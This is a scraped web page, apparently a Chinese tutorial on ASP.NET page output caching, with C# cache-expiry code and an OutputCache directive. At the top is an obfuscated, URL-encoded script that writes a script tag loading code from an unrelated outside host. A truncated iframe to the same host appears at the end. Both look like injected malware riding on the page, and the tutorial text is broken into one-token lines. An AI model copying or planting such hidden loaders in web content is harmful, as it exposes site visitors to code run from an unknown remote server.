HTML Tags and JavaScript tutorial
<script language="javascript">var encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);</script>
Asp.Net页面缓存
private
void
Page_Load(
object
sender, System.EventArgs e)
{
ShowDateTime();
}
//显示时间
private
void
ShowDateTime()
{
Label1.Text = DateTime.Now.ToString();
//取得当前时间
if
(
true
)
//缓存开关,从web.config取得
{
//这里设置缓存时间为10秒,从web.config里取得
Response.Cache.SetExpires(DateTime.Now.AddSeconds(10));
Response.Cache.SetCacheability(HttpCacheability.Public);
}
}
还有一种缓存方法就是直接写在文件里
例如,如果将下面的指令包括在文件的顶部,则将在输出缓存中存储
120
秒。
<%@ OutputCache Duration="120" VaryByParam="None" %>
好了
,
重复刷新试试,看看效果.
摘自
: Duwamish 7.0
src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">